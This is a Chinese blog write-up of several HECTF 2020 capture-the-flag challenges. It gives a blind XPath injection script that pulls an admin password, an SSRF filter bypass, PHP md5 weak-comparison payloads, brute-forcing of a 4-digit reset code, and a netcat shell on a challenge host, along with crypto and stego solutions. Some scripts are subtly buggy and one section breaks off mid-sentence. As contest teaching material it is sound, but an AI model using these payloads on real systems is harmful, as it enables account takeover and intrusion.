HECTF_2020 部分Writeup

拼搏现实的明天。 2022-12-24 05:57 211阅读 0赞

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzkyMzEzNg_size_16_color_FFFFFF_t_70_pic_center]  
*HECTF\_2020*

### web1 ###

打开题目发现要手机号登入,F12查看源码发现有个手机号<-- 15970773575 -->；尝试找回密码,根据hint.php给的提示发现,验证码是要通过爆破得来,且长度为4位；  
使用脚本生成字典

dz.py:
    f=open('zidian.txt','w')
    for i in range(9999):
        s=str(i)
        if len(s)==1:
            s="000"+s
        if len(s)==2:
            s="00"+s
        if len(s)==3:
            s="0"+s
        print s
    f.write(s+'\n')

然后通过bp破解一下  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzkyMzEzNg_size_16_color_FFFFFF_t_70_pic_center 1]  
得到0233是验证码,修改密码登入得到flag  
![在这里插入图片描述][20201127093001949.jpg_pic_center]

### Ssrf ###

查看源代码发现过滤了

ip2long('127.0.0.0')>>24==$int_ip>>24||ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16;

尝试使用url=http://loaclhost/flag.php,无果最后使用url=http://0.0.0.0/flag.php成功绕过得到flag

### injection ###

题目名称是注入,但结果sql注入无果,然后发现报错是：Warning: SimpleXMLElement::xpath():  
然后查看题目描述"X…X…X.Xpath!咚咚咚 是admin么，flag格式为flag\{\}。"；百度一下发现是xpath注入,因为没有回显结果,所以尝试盲注

import requests
    url='http://114.55.165.246:8082/?'
    r=requests.Session()
    str_all="qwertyuiopasdfghjklzxcvbnm0123456789_!{}-"
    def password():
        result=""
        for i in range(1,40):
            for j in str_all:
            payload="'orsubstring((//user[position()=1]/password),"+str(i)+",1)='"+j+"'or ''='"
           	  data="username="+payload+"&password=123"
                s=r.get(url+data+"&submit=%E7%99%BB%E5%BD%95")
                #print data+"&submit=%E7%99%BB%E5%BD%95"
                if 'not admin' in s.text:
                    result+=j
                    print(result)
                    break
    password()

最后  
username=admin  
password=339db714647a1d66b85cd08442287841

### ezphp ###

审计源码发现

if($_GET['param1']!==$_GET['param2']&&md5($_GET['param1'])===md5($_GET['param2'])){

这里使用弱类型即可绕过:

param1[]=a&param2[]=s

继续下一步

$md5_1 = md5($string_1); 
                $md5_2 = md5($string_2); 
                if($md5_1 != $md5_2){ 
                    $a = strtr($md5_1, 'cxhp', '0123'); 
                    $b = strtr($md5_2, 'cxhp', '0123'); 
    if($a == $b){
                    echo $flag;
    }

发现md5碰撞,使用0e开头绕过,找到个原题2019NJUPT的easyphp：  
https://zhzhdoai.github.io/2019/11/24/WRITEUP-2019NJUPT-web%E9%A2%98%E8%A7%A3/

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzkyMzEzNg_size_16_color_FFFFFF_t_70_pic_center 2]得到str1=2120624&str2=240610708最终的payload: param1\[\]=a&param2\[\]=b&str1=2120624&str2=240610708

### \[boom\]Maybe\_is\_medium ###

非预期解，链接nc 121.196.32.184 12003就能获取shell得到flag

### easymaze ###

老套路迷宫题  
还原一下迷宫：

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzkyMzEzNg_size_16_color_FFFFFF_t_70_pic_center 3]1000011000  
1100011100  
0100010100  
0111110100  
0000110100  
0000000100  
0000000110  
0000000010  
0000000011  
0000000001  
0000000000  
0000000000  
00000000  
走一遍就是flag

### png ###

在kali上点开图片显示IHDR：CRC error错误，猜测图片改了宽高；然后传到windows下查看图片，图片是少了一些，托到Winhex下修改宽高，如下图:  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzkyMzEzNg_size_16_color_FFFFFF_t_70_pic_center 4]  
保存图片后能看到一半flag，继续分析图片；用strings 命令查看图片字符串能看到末尾有一串base64，拿去 http://ctf.ssleye.com/ 这个网址解密即可得到另外一半flag

### 不说人话 ###

打开文件是一串!?.组成的编码，拿去 https://www.splitbrain.org/services/ook 这个网址解密即可得到flag

### 在这里签到 ###

通过https://www.sojson.com/encrypt\_rabbit.html进行 rabbit解密  
然后base64 解密；再base32 解密；最后hex 解密得到flag

### no blank space ###

等到赛方给了第二个提示，去网上科普了一下知道了这是博多电码  
然后拿去https

### rsa ###

已知 公钥（n, e） 和 密文 c,所以首先将n用yafu分解为q,p；  
脚本解得flag:

import gmpy2
    p = 2499568793
    q = 4568695582742345507136251229217400959960856046691733722988345503429689799935696593516299458516865110324638359470761456115925725067558499862591063153473862179550706262380644940013531317571260647226561004191266100720745936563550699000939117068559232225644277283541933064331891245169739139886735615435506152070330233107807124410892978280063993668726927377177983100529270996547002022341628251905780873531481682713820809147098305289391835297208890779643623465917824350382592808578978330348769060448006691307027594085634520759293965723855183484366752511654099121387261343686017189426761536281948007104498017003911
    e = 65537
    c = 575061710950381118206735073806398116370706587076775765253483131078316908073202143802386128272374323616239083134747318254436706806781744501903333604772961927966747648954315962269321297121495398057938617145017999482722197661065698707836824505023856306403892307944203245563411961302499347604417024064678999003637933185177922884103362203639349298263339808508185861692596967147081382566246627668898774233029198694500565511361867375668367875805985660705137109665107860799277624050210666866958502948062330037309873148963011192405012811945540153592090345668265964477204465327474208098404082920129178960510763496025906621820
    n = p * q
    fn = (p - 1) * (q - 1)
    d = gmpy2.invert(e, fn)
    h = hex(gmpy2.powmod(c, d, n))[2:]
    if len(h) % 2 == 1:
        h = '0' + h
    s = h.decode('hex')
    print s

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzkyMzEzNg_size_16_color_FFFFFF_t_70_pic_center]: /images/20221120/decbd7bd65534495a943d1ab001a6759.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzkyMzEzNg_size_16_color_FFFFFF_t_70_pic_center 1]: /images/20221120/23fb7737203a4798b4779eae86efe01c.png
[20201127093001949.jpg_pic_center]: /images/20221120/509831c5746d45fdbb8166197a1e21c6.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzkyMzEzNg_size_16_color_FFFFFF_t_70_pic_center 2]: https://img-blog.csdnimg.cn/20201127094406626.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzkyMzEzNg==,size_16,color_FFFFFF,t_70#pic_center
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzkyMzEzNg_size_16_color_FFFFFF_t_70_pic_center 3]: https://img-blog.csdnimg.cn/20201127094717153.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzkyMzEzNg==,size_16,color_FFFFFF,t_70#pic_center
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzkyMzEzNg_size_16_color_FFFFFF_t_70_pic_center 4]: https://img-blog.csdnimg.cn/20201127095338832.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzkyMzEzNg==,size_16,color_FFFFFF,t_70#pic_center